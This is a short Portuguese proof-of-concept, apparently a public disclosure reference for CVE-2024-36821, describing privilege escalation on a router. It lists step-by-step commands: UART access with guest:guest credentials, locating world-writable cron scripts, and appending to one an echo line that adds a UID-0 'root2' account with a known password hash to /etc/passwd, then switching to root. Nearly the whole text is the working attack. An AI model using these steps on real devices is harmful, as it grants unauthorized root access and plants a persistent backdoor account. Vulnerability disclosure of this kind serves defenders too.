
A referência pública que contém as informações mínimas necessárias para a vulnerabilidade coberta pelo CVE-2024-36821
A referência pública que contém as informações mínimas necessárias para a vulnerabilidade coberta pela CVE-2024-36821
Conecte-se ao roteador através da conexão UART
Usando as credenciais guest:guest, faça login no sistema
Usando o comando find / -perm -777 -type f 2>/dev/null, encontre arquivos com permissões de leitura, escrita e execução:
1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
5. /tmp/cron/cron.everyminute/conntrack_collector.sh
Verifique o proprietário com o comando ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh
Gere a senha com o comando openssl passwd Abracadabra
Edite /tmp/cron/cron.everyminute/conntrack_collector.sh, adicionando ao final a nova senha gerada:
echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
Aguarde um minuto
Troque para o usuário root2 com o próximo comando
/ $ su root2
Password: Abracadabra
~ #